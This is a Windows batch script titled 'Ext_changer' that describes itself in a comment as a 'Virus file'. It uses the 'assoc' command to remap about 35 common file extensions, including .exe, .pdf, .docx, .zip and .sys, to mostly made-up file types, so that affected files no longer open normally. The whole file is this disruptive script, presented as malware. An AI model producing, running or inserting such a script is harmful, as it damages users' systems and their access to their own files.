@echo off
title Ext_changer
color a
Rem This Virus file replaces the actual file extensions with the given extensions
@echo off
assoc .txt=txtfile
assoc .exe=exefile
assoc .jpeg=jpegfile
assoc .png=pngfile
assoc .mpeg=mpegfile
assoc .mp4=mp4file
assoc .mp3=mp3file
assoc .xht=xhtfile
assoc .xhtml=xhtmlfile
assoc .pdf=pdffile
assoc .wma=wmafile
assoc .mkv=mkvfile
assoc .html=htmlfile
assoc .doc=docfile
assoc .docx=docxfile
assoc .ppt=pptfile
assoc .pptx=pptxfile
assoc .docxml=docxmlfile
assoc .apk=apkfile
assoc .avi=avifile
assoc .rar=rarfile
assoc .zip=zipfile
assoc .crt=crtfile
assoc .dochtml=dochtmlfile
assoc .fly=flyfile
assoc .htm=htmfile
assoc .jar=jarfile
assoc .c=cfile
assoc .java=javafile
assoc .cpp=cppfile
assoc .jpeg=jpegfile
assoc .jpg=jpgfile
assoc .gif=giffile
assoc .vlc=vlcfile

assoc .sys=sysfile
exit